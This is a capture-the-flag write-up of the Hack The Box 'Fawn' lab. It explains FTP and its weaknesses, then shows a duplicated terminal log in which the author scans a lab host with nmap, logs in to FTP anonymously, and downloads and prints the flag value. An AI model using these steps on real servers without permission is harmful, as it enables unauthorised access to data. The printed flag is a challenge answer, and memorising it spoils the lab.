Fawn HTB Writeup

October 5, 2024, 1:14 am

Overview

When assessing the services on specific hosts within a client network, we often encounter file transfer services that may be prone to poor configuration. This exercise aims to build familiarity with the File Transfer Protocol (FTP), a common and long-standing protocol for file transfers across various operating systems. Though widely used, FTP can be vulnerable when not properly configured. It’s not uncommon for employees within a client organization to attempt bypassing security measures when transferring files, which can lead to weaknesses.

FTP is also commonly used for transferring log files between network devices or to a log collection server. However, if a network engineer fails to secure the receiving FTP server, sensitive log data can be exposed, which an attacker could leverage for network mapping, identifying usernames, and detecting active services.

Understanding FTP

FTP operates on a client-server model, where a client (the user's machine) uploads or downloads files to/from a server (central storage). This model allows for clear roles within data transfer, where the server manages and stores files, while the client requests and transfers them. FTP requires credentials for access, but some servers allow anonymous logins, which poses security risks. For secure transmissions, FTP can be supplemented with SSL/TLS (FTPS) or replaced by the SSH File Transfer Protocol (SFTP).

Services on Ports

A port serves as a dedicated channel through which services run, allowing one IP address to manage multiple tasks. For example, a host can run FTP on port 21, SSH on port 22, and HTTPD for web services simultaneously. This setup enables a network administrator to manage configurations, access logs, and serve web content remotely, all at the same time.

Security Concerns

Without proper encryption via SSL/TLS or SSH tunnelling, FTP is vulnerable to Man-in-the-Middle (MitM) attacks, where the transferred data can be intercepted and viewed in plaintext. Tunnelling FTP through SSH (moving from port 21 to port 22) can effectively prevent this type of attack by encrypting the connection, ensuring that only the source and destination can decrypt the data.

Practical Example

In this case, we’ll examine a simple misconfigured FTP service on an internal host. By establishing a connection to the target and scanning for open services, we can identify FTP running on port 21. Using version detection switches can help determine if outdated or vulnerable software is in use, allowing us to make better decisions about our attack strategy.

Gaining Access

To interact with the FTP service, we use the

command on our machine. Once installed, this command allows us to connect to the target host. If the service is misconfigured to allow anonymous logins, we can use “anonymous” as the username and provide any password, gaining access to the server.

Once logged in, we can execute FTP commands like

(list directory contents) and

(change directory) to navigate the server. Using the

command, we can download specific files, such as a flag file, to our local machine.

The Whole Process:

┌──(morb㉿AllYourBase)-[~]

└─$ ping 10.129.1.14

PING 10.129.1.14 (10.129.1.14) 56(84) bytes of data.

64 bytes from 10.129.1.14: icmp_seq=1 ttl=62 time=58.8 ms

64 bytes from 10.129.1.14: icmp_seq=2 ttl=62 time=64.8 ms

64 bytes from 10.129.1.14: icmp_seq=3 ttl=62 time=83.6 ms

^C

--- 10.129.1.14 ping statistics ---

3 packets transmitted, 3 received, 0% packet loss, time 2004ms

rtt min/avg/max/mdev = 58.799/69.038/83.566/10.555 ms

┌──(morb㉿AllYourBase)-[~]

└─$ sudo nmap -sV 10.129.1.14

[sudo] password for morb:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 03:12 CEST

Nmap scan report for 10.129.1.14

Host is up (0.083s latency).

Not shown: 999 closed tcp ports (reset)

PORT   STATE SERVICE VERSION

21/tcp open  ftp     vsftpd 3.0.3

Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds

┌──(morb㉿AllYourBase)-[~]

└─$ ftp 10.129.1.14

Connected to 10.129.1.14.

220 (vsFTPd 3.0.3)

Name (10.129.1.14:morb): anonymous

331 Please specify the password.

Password:

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls

229 Entering Extended Passive Mode (|||19839|)

150 Here comes the directory listing.

-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt

226 Directory send OK.

ftp> get flag.txt

local: flag.txt remote: flag.txt

229 Entering Extended Passive Mode (|||10329|)

150 Opening BINARY mode data connection for flag.txt (32 bytes).

100% |***************************************************************************|    32      664.89 KiB/s    00:00 ETA

226 Transfer complete.

32 bytes received in 00:00 (0.17 KiB/s)

ftp> bye

221 Goodbye.

┌──(morb㉿AllYourBase)-[~]

└─$ ls

flag.txt  rce-ploit.sh  reports

┌──(morb㉿AllYourBase)-[~]

└─$ cat file.txt

cat: file.txt: No such file or directory

┌──(morb㉿AllYourBase)-[~]

└─$ ls

flag.txt  rce-ploit.sh  reports

┌──(morb㉿AllYourBase)-[~]

└─$ cd

┌──(morb㉿AllYourBase)-[~]

└─$ dir

flag.txt  rce-ploit.sh  reports

┌──(morb㉿AllYourBase)-[~]

└─$ cat flag.txt

035db21c881520061c53e0536e44f815

┌──(morb㉿AllYourBase)-[~]

└─$ ping 10.129.1.14

PING 10.129.1.14 (10.129.1.14) 56(84) bytes of data.

64 bytes from 10.129.1.14: icmp_seq=1 ttl=62 time=94.8 ms

64 bytes from 10.129.1.14: icmp_seq=2 ttl=62 time=107 ms

64 bytes from 10.129.1.14: icmp_seq=3 ttl=62 time=134 ms

^C

--- 10.129.1.14 ping statistics ---

3 packets transmitted, 3 received, 0% packet loss, time 2003ms

rtt min/avg/max/mdev = 94.810/111.989/133.920/16.316 ms

┌──(morb㉿AllYourBase)-[~]

└─$ sudo nmap -sV 10.129.1.14

[sudo] password for morb:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 03:11 CEST

Nmap scan report for 10.129.1.14

Host is up (0.11s latency).

Not shown: 999 closed tcp ports (reset)

PORT   STATE SERVICE VERSION

21/tcp open  ftp     vsftpd 3.0.3

Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 2.28 seconds

┌──(morb㉿AllYourBase)-[~]

└─$ ftp 10.129.1.14

Connected to 10.129.1.14.

220 (vsFTPd 3.0.3)

Name (10.129.1.14:morb): anonymous

331 Please specify the password.

Password:

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls

229 Entering Extended Passive Mode (|||32174|)

150 Here comes the directory listing.

-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt

226 Directory send OK.

ftp> get flag.txt

local: flag.txt remote: flag.txt

229 Entering Extended Passive Mode (|||8751|)

150 Opening BINARY mode data connection for flag.txt (32 bytes).

100% |***************************************************************************|    32        0.28 KiB/s    00:00 ETA

226 Transfer complete.

32 bytes received in 00:00 (0.08 KiB/s)

ftp> bye

221 Goodbye.

┌──(morb㉿AllYourBase)-[~]

└─$ ls

flag.txt  rce-ploit.sh  reports

┌──(morb㉿AllYourBase)-[~]

└─$ cat flag.txt

035db21c881520061c53e0536e44f815

Conclusion

By successfully navigating and interacting with the FTP service, we can download the target file and complete the challenge. The key to exploiting FTP vulnerabilities lies in understanding the potential misconfigurations and how to leverage basic tools and commands to access critical data.

Back to Blog